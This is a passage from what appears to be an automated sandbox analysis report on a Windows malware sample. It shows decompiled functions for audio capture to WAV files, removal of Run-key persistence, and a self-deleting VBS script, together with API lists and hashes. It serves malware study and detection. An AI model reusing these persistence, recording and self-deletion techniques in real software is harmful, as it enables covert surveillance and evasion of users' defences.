                              								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
                              									break;
                              								}
                              								_t89 = _t89 + 1;
                              								__eflags = _t89 - 8;
                              								if(_t89 != 8) {
                              									continue;
                              								} else {
                              									SetEvent( *0x46bea8);
                              								}
                              								break;
                              							}
                              							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
                              							if(__eflags != 0) {
                              								_t43 =  *0x46bea8; // 0x0
                              							} else {
                              								CloseHandle( *0x46bea8);
                              								_t43 = 0;
                              								goto L5;
                              							}
                              						}
                              						mciSendStringA("stop audio", 0, 0, 0);
                              						mciSendStringA("close audio", 0, 0, 0);
                              						E00402064(0, _t115 - 0x18, 0x45f6ac);
                              						_push(0xaa);
                              						L00404A6E(0, 0x46ca00, _t108, _t122);
                              						L00401ED0();
                              						goto L21;
                              					}
                              				}
                              				L21:
                              				return L00401ED0();
                              			}

                              Instruction address column (0x0041636b to 0x004165b0), no longer aligned to the code above

                              APIs
                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416450
                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416464
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6AC), ref: 00416489
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 0041649F
                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 004164E0
                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 004164F8
                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041650C
                              • SetEvent.KERNEL32 ref: 0041652D
                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041653E
                              • CloseHandle.KERNEL32 ref: 0041654E
                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416570
                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041657A
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                              • API String ID: 738084811-1354618412
                              • Opcode ID: 25cfce673dce31bed8baf2ba1d29a164df51879723e29213e1e10257fff3c748
                              • Instruction ID: c8fb6d8f14581896d3eba004d9fbc9f1a09e24d5ac4ccc55cdd35aae18883956
                              • Opcode Fuzzy Hash: 25cfce673dce31bed8baf2ba1d29a164df51879723e29213e1e10257fff3c748
                              • Instruction Fuzzy Hash: 4C51B4716002087AD714BB75DC96DFF3A6DDA50389F14003FF501A61E2EE788E8586AE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E0040B107() {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				char _v148;
                              				short _v668;
                              				void* _t49;
                              				void* _t50;
                              				void* _t53;
                              				void* _t56;
                              				void* _t82;
                              				void* _t84;
                              				void* _t85;
                              				signed char _t123;
                              				signed char _t124;
                              				void* _t227;
                              				void* _t229;
                              				void* _t230;
                              				void* _t231;
                              
                              				L0040FB4B();
                              				if( *0x46a9d4 != 0x30) {
                              					L00409D75();
                              				}
                              				_t227 =  *0x46bd6b - 1; // 0x0
                              				if(_t227 == 0) {
                              					L00414D1D(_t227);
                              				}
                              				if( *0x46ba75 != 0) {
                              					E004170AC(L00401ECB(0x46c0e0));
                              				}
                              				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                              				_t229 =  *0x46bb06 - 1; // 0x0
                              				if(_t229 == 0) {
                              					E0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
                              				}
                              				_t230 =  *0x46baff - 1; // 0x0
                              				if(_t230 == 0) {
                              					E0041074C(0x80000002, _t214, L00401ECB(0x46c4e8));
                              				}
                              				_t231 =  *0x46bb04 - 1; // 0x0
                              				if(_t231 == 0) {
                              					E0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
                              				}
                              				E00431810(0,  &_v668, 0, 0x208);
                              				_t49 = E00402469();
                              				_t50 = L00401F75(0x46c560);
                              				_t53 = E00410420(L00401F75(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49);
                              				_t232 = _t53;
                              				if(_t53 == 0) {
                              					GetModuleFileNameW(0,  &_v668, 0x208);
                              				}
                              				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
                              				_t56 = E004074E6(_t232);
                              				_t233 = _t56;
                              				if(_t56 != 0) {
                              					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
                              				}
                              				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
                              				asm("sbb bl, bl");
                              				E00403086(_t123,  &_v148, L00416C32( &_v76, E004169EB( &_v28)), 0, _t233, L".vbs");
                              				L00401ED0();
                              				L00401FA7();
                              				E00404409(_t123,  &_v124, E00403086(_t123,  &_v28, E0040425F(_t123,  &_v76, E0043918F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
                              				L00401ED0();
                              				L00401ED0();
                              				E004043E5(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040425F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                              				L00401ED0();
                              				_t124 = _t123 & 0x00000001;
                              				_t234 = _t124;
                              				if(_t124 != 0) {
                              					E004032F1(E00403086(_t124,  &_v28, E004043E5(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040425F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
                              					L00401ED0();
                              					L00401ED0();
                              					L00401ED0();
                              				}
                              				E004032F1(E00403086(_t124,  &_v100, E00403086(_t124,  &_v28, E0040425F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				_t235 = _t124;
                              				if(_t124 != 0) {
                              					E0040766E(_t124,  &_v52, 0, L"wend\n");
                              				}
                              				_t82 = E004074E6(_t235);
                              				_t236 = _t82;
                              				if(_t82 != 0) {
                              					E004032F1(E00403086(0x45f714,  &_v100, L00409E6B( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
                              					L00401ED0();
                              					L00401ED0();
                              				}
                              				E0040766E(0x45f714,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                              				_t84 = L00401ECB( &_v124);
                              				_t85 = E00402469();
                              				if(E0041729F(L00401ECB( &_v52), _t85 + _t85, _t84, 0) != 0) {
                              					ShellExecuteW(0, L"open", L00401ECB( &_v124), 0x45f714, 0x45f714, 0);
                              				}
                              				ExitProcess(0);
                              			}

                              Instruction address column (0x0040b113 to 0x0040b45e), no longer aligned to the code above

                              APIs
                                • Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,?,0040B118), ref: 0040FB5B
                                • Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF,?,0040B118), ref: 0040FB6E
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B211
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B224
                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B252
                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B260
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,?,0040B126), ref: 00409D84
                                • Part of subcall function 00409D75: UnhookWindowsHookEx.USER32(00000000), ref: 00409D94
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(Function_00008832,00000000,?,0040B126), ref: 00409DA6
                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B457
                              • ExitProcess.KERNEL32 ref: 0040B45E
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                              • API String ID: 3659626935-2802769051
                              • Opcode ID: 847bee91743045f3007174e1e95ac693254bb67ba72c4d55a7afc5f21e8df2f8
                              • Instruction ID: 1fdbb4419d14362d38d1ed4744bf8d6dc0aba1f6708a8cbb9b41b7a1a16d8b70
                              • Opcode Fuzzy Hash: 847bee91743045f3007174e1e95ac693254bb67ba72c4d55a7afc5f21e8df2f8
                              • Instruction Fuzzy Hash: 86819D31A101086ACB14F7A2DCA69EF77699F50748F14003FF506772E2EE785E8A869D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E00401A44(WCHAR* __ecx, signed int __edx) {
                              				long _v8;
                              				void _v12;
                              				void _v16;
                              				void _v20;
                              				void _v24;
                              				void _v28;
                              				void _v32;
                              				signed int _t36;
                              				void** _t75;
                              				signed int _t80;
                              				void* _t81;
                              				signed int _t83;
                              
                              				_t75 = __edx;
                              				_t80 =  *0x46ba9a & 0x0000ffff;
                              				_t83 = ( *0x46baa6 & 0x0000ffff) * _t80;
                              				_v20 = 1;
                              				_v16 = 0x10;
                              				_v24 = _t83 *  *0x46ba9c >> 3;
                              				asm("cdq");
                              				_v28 = _t83 + (__edx & 0x00000007) >> 3;
                              				_t36 =  *(__edx + 4) * _t80;
                              				_v32 = _t36;
                              				_v12 = _t36 + 0x24;
                              				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                              				if(_t81 != 0xffffffff) {
                              					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
                              					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
                              					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
                              					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
                              					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
                              					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
                              					WriteFile(_t81, 0x46ba9a, 2,  &_v8, 0);
                              					WriteFile(_t81, 0x46ba9c, 4,  &_v8, 0);
                              					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
                              					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
                              					WriteFile(_t81, 0x46baa6, 2,  &_v8, 0);
                              					WriteFile(_t81, "data", 4,  &_v8, 0);
                              					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
                              					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
                              					CloseHandle(_t81);
                              					return 1;
                              				}
                              				return 0;
                              			}

                              Instruction address column (0x00401a53 to 0x00401ba4), no longer aligned to the code above

                              APIs
                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AAC
                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AD3
                              • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AE2
                              • WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF2
                              • WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
                              • WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B11
                              • WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B20
                              • WriteFile.KERNEL32(00000000,0046BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B30
                              • WriteFile.KERNEL32(00000000,0046BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B40
                              • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B4F
                              • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B5E
                              • WriteFile.KERNEL32(00000000,0046BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B6E
                              • WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B7E
                              • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B8D
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$Write$Create
                              • String ID: RIFF$WAVE$data$fmt
                              • API String ID: 1602526932-4212202414
                              • Opcode ID: 422b5d87e93fc4075c6ec35830616d194da27f1ddb5db7f37ea2b3f51acf71b2
                              • Instruction ID: b5e00df74bb3e46237e128d7157f8ec2d4ab39d7b9d0c44a05e459c2c922e607
                              • Opcode Fuzzy Hash: 422b5d87e93fc4075c6ec35830616d194da27f1ddb5db7f37ea2b3f51acf71b2
                              • Instruction Fuzzy Hash: B8413EB5A50218BAE710DA91CC86FFF7BBCDB45B50F500066F704EA0C0D7B45A05DBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E0044625D(signed int _a4, signed int _a8) {
                              				signed int _v0;
                              				signed char _v5;
                              				intOrPtr _v8;
                              				signed char _v9;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				intOrPtr _v24;
                              				signed int _v44;
                              				signed int _v92;
                              				signed int _v128;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t116;
                              				signed int _t119;
                              				signed int _t120;
                              				signed int _t122;
                              				signed int _t123;
                              				signed int _t126;
                              				signed int _t127;
                              				signed int _t131;
                              				signed int _t133;
                              				signed int _t136;
                              				signed int _t138;
                              				signed int _t139;
                              				signed int _t142;
                              				void* _t143;
                              				signed int _t148;
                              				signed int* _t150;
                              				signed int* _t156;
                              				signed int _t163;
                              				signed int _t165;
                              				signed int _t167;
                              				intOrPtr _t168;
                              				signed int _t173;
                              				signed int _t175;
                              				signed int _t176;
                              				signed int _t180;
                              				signed int _t185;
                              				intOrPtr* _t186;
                              				signed int _t191;
                              				signed int _t196;
                              				signed int _t197;
                              				signed int _t204;
                              				intOrPtr* _t205;
                              				signed int _t214;
                              				signed int _t215;
                              				signed int _t217;
                              				signed int _t218;
                              				signed int _t220;
                              				signed int _t221;
                              				signed int _t223;
                              				intOrPtr _t225;
                              				void* _t231;
                              				signed int _t233;
                              				void* _t236;
                              				signed int _t237;
                              				signed int _t238;
                              				void* _t241;
                              				signed int _t244;
                              				signed int _t246;
                              				void* _t252;
                              				signed int _t253;
                              				signed int _t254;
                              				void* _t260;
                              				void* _t262;
                              				signed int _t263;
                              				intOrPtr* _t267;
                              				intOrPtr* _t271;
                              				signed int _t274;
                              				signed int _t276;
                              				signed int _t280;
                              				signed int _t282;
                              				void* _t283;
                              				void* _t284;
                              				void* _t285;
                              				signed int _t286;
                              				signed int _t288;
                              				signed int _t290;
                              				signed int _t291;
                              				signed int* _t292;
                              				signed int _t298;
                              				signed int _t299;
                              				CHAR* _t300;
                              				signed int _t302;
                              				signed int _t303;
                              				WCHAR* _t304;
                              				signed int _t305;
                              				signed int _t306;
                              				signed int* _t307;
                              				signed int _t308;
                              				signed int _t310;
                              				void* _t316;
                              				void* _t317;
                              				void* _t318;
                              				void* _t320;
                              				void* _t321;
                              				void* _t322;
                              				void* _t323;
                              
                              				_t217 = _a4;
                              				if(_t217 != 0) {
                              					_t286 = _t217;
                              					_t116 = E00434870(_t217, 0x3d);
                              					_v16 = _t116;
                              					_t231 = _t285;
                              					__eflags = _t116;
                              					if(_t116 == 0) {
                              						L10:
                              						 *((intOrPtr*)(L00439E14())) = 0x16;
                              						goto L11;
                              					} else {
                              						__eflags = _t116 - _t217;
                              						if(_t116 == _t217) {
                              							goto L10;
                              						} else {
                              							__eflags =  *((char*)(_t116 + 1));
                              							_t298 =  *0x46b4d0; // 0x3179e90
                              							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                              							_v5 = _t120;
                              							__eflags = _t298 -  *0x46b4dc; // 0x3179e90
                              							if(__eflags == 0) {
                              								L87();
                              								_t298 = _t120;
                              								_t120 = _v5;
                              								_t231 = _t298;
                              								 *0x46b4d0 = _t298;
                              							}
                              							_t218 = 0;
                              							__eflags = _t298;
                              							if(_t298 != 0) {
                              								L21:
                              								_t233 = _t286;
                              								_t122 = _v16 - _t233;
                              								_push(_t122);
                              								_push(_t233);
                              								L121();
                              								_v12 = _t122;
                              								__eflags = _t122;
                              								if(_t122 < 0) {
                              									L29:
                              									__eflags = _v5 - _t218;
                              									if(_v5 != _t218) {
                              										goto L12;
                              									} else {
                              										_t123 =  ~_t122;
                              										_v12 = _t123;
                              										_t27 = _t123 + 2; // 0x2
                              										_t236 = _t27;
                              										__eflags = _t236 - _t123;
                              										if(_t236 < _t123) {
                              											goto L11;
                              										} else {
                              											__eflags = _t236 - 0x3fffffff;
                              											if(_t236 >= 0x3fffffff) {
                              												goto L11;
                              											} else {
                              												_push(4);
                              												_push(_t236);
                              												_t299 = E00446905(_t298);
                              												L0043EE85(_t218);
                              												_t320 = _t320 + 0x10;
                              												__eflags = _t299;
                              												if(_t299 == 0) {
                              													goto L11;
                              												} else {
                              													_t237 = _v12;
                              													_t286 = _t218;
                              													_t126 = _a4;
                              													 *(_t299 + _t237 * 4) = _t126;
                              													 *(_t299 + 4 + _t237 * 4) = _t218;
                              													goto L34;
                              												}
                              											}
                              										}
                              									}
                              								} else {
                              									__eflags =  *_t298 - _t218;
                              									if( *_t298 == _t218) {
                              										goto L29;
                              									} else {
                              										L0043EE85( *((intOrPtr*)(_t298 + _t122 * 4)));
                              										_t282 = _v12;
                              										__eflags = _v5 - _t218;
                              										if(_v5 != _t218) {
                              											while(1) {
                              												__eflags =  *(_t298 + _t282 * 4) - _t218;
                              												if( *(_t298 + _t282 * 4) == _t218) {
                              													break;
                              												}
                              												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
                              												_t282 = _t282 + 1;
                              												__eflags = _t282;
                              											}
                              											_push(4);
                              											_push(_t282);
                              											_t299 = E00446905(_t298);
                              											L0043EE85(_t218);
                              											_t320 = _t320 + 0x10;
                              											_t126 = _t286;
                              											__eflags = _t299;
                              											if(_t299 != 0) {
                              												L34:
                              												 *0x46b4d0 = _t299;
                              											}
                              										} else {
                              											_t126 = _a4;
                              											_t286 = _t218;
                              											 *(_t298 + _t282 * 4) = _t126;
                              										}
                              										__eflags = _a8 - _t218;
                              										if(_a8 == _t218) {
                              											goto L12;
                              										} else {
                              											_t238 = _t126;
                              											_t283 = _t238 + 1;
                              											do {
                              												_t127 =  *_t238;
                              												_t238 = _t238 + 1;
                              												__eflags = _t127;
                              											} while (_t127 != 0);
                              											_v12 = _t238 - _t283 + 2;
                              											_t300 = L0043DFD9(_t238 - _t283, _t238 - _t283 + 2, 1);
                              											_pop(_t241);
                              											__eflags = _t300;
                              											if(_t300 == 0) {
                              												L42:
                              												L0043EE85(_t300);
                              												goto L12;
                              											} else {
                              												_t131 = E004405A6(_t300, _v12, _a4);
                              												_t321 = _t320 + 0xc;
                              												__eflags = _t131;
                              												if(_t131 != 0) {
                              													_push(_t218);
                              													_push(_t218);
                              													_push(_t218);
                              													_push(_t218);
                              													_push(_t218);
                              													E0043629A();
                              													asm("int3");
                              													_t316 = _t321;
                              													_t322 = _t321 - 0xc;
                              													_push(_t218);
                              													_t220 = _v44;
                              													__eflags = _t220;
                              													if(_t220 != 0) {
                              														_push(_t300);
                              														_push(_t286);
                              														_push(0x3d);
                              														_t288 = _t220;
                              														_t133 = E00450867(_t241);
                              														_v20 = _t133;
                              														_t244 = _t220;
                              														__eflags = _t133;
                              														if(_t133 == 0) {
                              															L54:
                              															 *((intOrPtr*)(L00439E14())) = 0x16;
                              															goto L55;
                              														} else {
                              															__eflags = _t133 - _t220;
                              															if(_t133 == _t220) {
                              																goto L54;
                              															} else {
                              																_t302 =  *0x46b4d4; // 0x0
                              																_t221 = 0;
                              																__eflags =  *(_t133 + 2);
                              																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                              																_v9 = _t246;
                              																__eflags = _t302 -  *0x46b4d8; // 0x0
                              																if(__eflags == 0) {
                              																	_push(_t302);
                              																	L104();
                              																	_t246 = _v9;
                              																	_t302 = _t133;
                              																	 *0x46b4d4 = _t302;
                              																}
                              																__eflags = _t302;
                              																if(_t302 != 0) {
                              																	L64:
                              																	_v20 = _v20 - _t288 >> 1;
                              																	_t138 = E00446898(_t288, _v20 - _t288 >> 1);
                              																	_v16 = _t138;
                              																	__eflags = _t138;
                              																	if(_t138 < 0) {
                              																		L72:
                              																		__eflags = _v9 - _t221;
                              																		if(_v9 != _t221) {
                              																			goto L56;
                              																		} else {
                              																			_t139 =  ~_t138;
                              																			_v16 = _t139;
                              																			_t72 = _t139 + 2; // 0x2
                              																			_t252 = _t72;
                              																			__eflags = _t252 - _t139;
                              																			if(_t252 < _t139) {
                              																				goto L55;
                              																			} else {
                              																				__eflags = _t252 - 0x3fffffff;
                              																				if(_t252 >= 0x3fffffff) {
                              																					goto L55;
                              																				} else {
                              																					_push(4);
                              																					_push(_t252);
                              																					_t303 = E00446905(_t302);
                              																					L0043EE85(_t221);
                              																					_t322 = _t322 + 0x10;
                              																					__eflags = _t303;
                              																					if(_t303 == 0) {
                              																						goto L55;
                              																					} else {
                              																						_t253 = _v16;
                              																						_t288 = _t221;
                              																						_t142 = _v0;
                              																						 *(_t303 + _t253 * 4) = _t142;
                              																						 *(_t303 + 4 + _t253 * 4) = _t221;
                              																						goto L77;
                              																					}
                              																				}
                              																			}
                              																		}
                              																	} else {
                              																		__eflags =  *_t302 - _t221;
                              																		if( *_t302 == _t221) {
                              																			goto L72;
                              																		} else {
                              																			L0043EE85( *((intOrPtr*)(_t302 + _t138 * 4)));
                              																			_t276 = _v16;
                              																			__eflags = _v9 - _t221;
                              																			if(_v9 != _t221) {
                              																				while(1) {
                              																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                              																					if( *(_t302 + _t276 * 4) == _t221) {
                              																						break;
                              																					}
                              																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
                              																					_t276 = _t276 + 1;
                              																					__eflags = _t276;
                              																				}
                              																				_push(4);
                              																				_push(_t276);
                              																				_t303 = E00446905(_t302);
                              																				L0043EE85(_t221);
                              																				_t322 = _t322 + 0x10;
                              																				_t142 = _t288;
                              																				__eflags = _t303;
                              																				if(_t303 != 0) {
                              																					L77:
                              																					 *0x46b4d4 = _t303;
                              																				}
                              																			} else {
                              																				_t142 = _v0;
                              																				_t288 = _t221;
                              																				 *(_t302 + _t276 * 4) = _t142;
                              																			}
                              																			__eflags = _a4 - _t221;
                              																			if(_a4 == _t221) {
                              																				goto L56;
                              																			} else {
                              																				_t254 = _t142;
                              																				_t81 = _t254 + 2; // 0x2
                              																				_t284 = _t81;
                              																				do {
                              																					_t143 =  *_t254;
                              																					_t254 = _t254 + 2;
                              																					__eflags = _t143 - _t221;
                              																				} while (_t143 != _t221);
                              																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                              																				_v16 = _t82;
                              																				_t304 = L0043DFD9(_t254 - _t284 >> 1, _t82, 2);
                              																				_pop(_t258);
                              																				__eflags = _t304;
                              																				if(_t304 == 0) {
                              																					L85:
                              																					L0043EE85(_t304);
                              																					goto L56;
                              																				} else {
                              																					_t148 = E00440264(_t304, _v16, _v0);
                              																					_t323 = _t322 + 0xc;
                              																					__eflags = _t148;
                              																					if(_t148 != 0) {
                              																						_push(_t221);
                              																						_push(_t221);
                              																						_push(_t221);
                              																						_push(_t221);
                              																						_push(_t221);
                              																						E0043629A();
                              																						asm("int3");
                              																						_push(_t316);
                              																						_t317 = _t323;
                              																						_push(_t288);
                              																						_t290 = _v92;
                              																						__eflags = _t290;
                              																						if(_t290 != 0) {
                              																							_t260 = 0;
                              																							_t150 = _t290;
                              																							__eflags =  *_t290;
                              																							if( *_t290 != 0) {
                              																								do {
                              																									_t150 =  &(_t150[1]);
                              																									_t260 = _t260 + 1;
                              																									__eflags =  *_t150;
                              																								} while ( *_t150 != 0);
                              																							}
                              																							_t93 = _t260 + 1; // 0x2
                              																							_t305 = L0043DFD9(_t260, _t93, 4);
                              																							_t262 = _t304;
                              																							__eflags = _t305;
                              																							if(_t305 == 0) {
                              																								L102:
                              																								E0043E5DA(_t221, _t284, _t290, _t305);
                              																								goto L103;
                              																							} else {
                              																								__eflags =  *_t290;
                              																								if( *_t290 == 0) {
                              																									L100:
                              																									L0043EE85(0);
                              																									_t175 = _t305;
                              																									goto L101;
                              																								} else {
                              																									_push(_t221);
                              																									_t221 = _t305 - _t290;
                              																									__eflags = _t221;
                              																									do {
                              																										_t271 =  *_t290;
                              																										_t94 = _t271 + 1; // 0x5
                              																										_t284 = _t94;
                              																										do {
                              																											_t176 =  *_t271;
                              																											_t271 = _t271 + 1;
                              																											__eflags = _t176;
                              																										} while (_t176 != 0);
                              																										_t262 = _t271 - _t284;
                              																										_t95 = _t262 + 1; // 0x6
                              																										_v16 = _t95;
                              																										 *(_t221 + _t290) = L0043DFD9(_t262, _t95, 1);
                              																										L0043EE85(0);
                              																										_t323 = _t323 + 0xc;
                              																										__eflags =  *(_t221 + _t290);
                              																										if( *(_t221 + _t290) == 0) {
                              																											goto L102;
                              																										} else {
                              																											_t180 = E004405A6( *(_t221 + _t290), _v16,  *_t290);
                              																											_t323 = _t323 + 0xc;
                              																											__eflags = _t180;
                              																											if(_t180 != 0) {
                              																												L103:
                              																												_push(0);
                              																												_push(0);
                              																												_push(0);
                              																												_push(0);
                              																												_push(0);
                              																												E0043629A();
                              																												asm("int3");
                              																												_push(_t317);
                              																												_t318 = _t323;
                              																												_push(_t262);
                              																												_push(_t262);
                              																												_push(_t290);
                              																												_t291 = _v128;
                              																												__eflags = _t291;
                              																												if(_t291 != 0) {
                              																													_push(_t221);
                              																													_t223 = 0;
                              																													_t156 = _t291;
                              																													_t263 = 0;
                              																													_v20 = 0;
                              																													_push(_t305);
                              																													__eflags =  *_t291;
                              																													if( *_t291 != 0) {
                              																														do {
                              																															_t156 =  &(_t156[1]);
                              																															_t263 = _t263 + 1;
                              																															__eflags =  *_t156;
                              																														} while ( *_t156 != 0);
                              																													}
                              																													_t104 = _t263 + 1; // 0x2
                              																													_t306 = L0043DFD9(_t263, _t104, 4);
                              																													__eflags = _t306;
                              																													if(_t306 == 0) {
                              																														L119:
                              																														E0043E5DA(_t223, _t284, _t291, _t306);
                              																														goto L120;
                              																													} else {
                              																														__eflags =  *_t291 - _t223;
                              																														if( *_t291 == _t223) {
                              																															L117:
                              																															L0043EE85(_t223);
                              																															_t167 = _t306;
                              																															goto L118;
                              																														} else {
                              																															_t223 = _t306 - _t291;
                              																															__eflags = _t223;
                              																															do {
                              																																_t267 =  *_t291;
                              																																_t105 = _t267 + 2; // 0x6
                              																																_t284 = _t105;
                              																																do {
                              																																	_t168 =  *_t267;
                              																																	_t267 = _t267 + 2;
                              																																	__eflags = _t168 - _v20;
                              																																} while (_t168 != _v20);
                              																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
                              																																_v24 = _t107;
                              																																 *(_t223 + _t291) = L0043DFD9(_t267 - _t284 >> 1, _t107, 2);
                              																																L0043EE85(0);
                              																																_t323 = _t323 + 0xc;
                              																																__eflags =  *(_t223 + _t291);
                              																																if( *(_t223 + _t291) == 0) {
                              																																	goto L119;
                              																																} else {
                              																																	_t173 = E00440264( *(_t223 + _t291), _v24,  *_t291);
                              																																	_t323 = _t323 + 0xc;
                              																																	__eflags = _t173;
                              																																	if(_t173 != 0) {
                              																																		L120:
                              																																		_push(0);
                              																																		_push(0);
                              																																		_push(0);
                              																																		_push(0);
                              																																		_push(0);
                              																																		E0043629A();
                              																																		asm("int3");
                              																																		_push(_t318);
                              																																		_push(_t223);
                              																																		_push(_t306);
                              																																		_push(_t291);
                              																																		_t292 =  *0x46b4d0; // 0x3179e90
                              																																		_t307 = _t292;
                              																																		__eflags =  *_t292;
                              																																		if( *_t292 == 0) {
                              																																			L127:
                              																																			_t308 = _t307 - _t292;
                              																																			__eflags = _t308;
                              																																			_t310 =  ~(_t308 >> 2);
                              																																		} else {
                              																																			_t225 = _v8;
                              																																			do {
                              																																				_t163 = E00443141(_v12,  *_t307, _t225);
                              																																				_t323 = _t323 + 0xc;
                              																																				__eflags = _t163;
                              																																				if(_t163 != 0) {
                              																																					goto L126;
                              																																				} else {
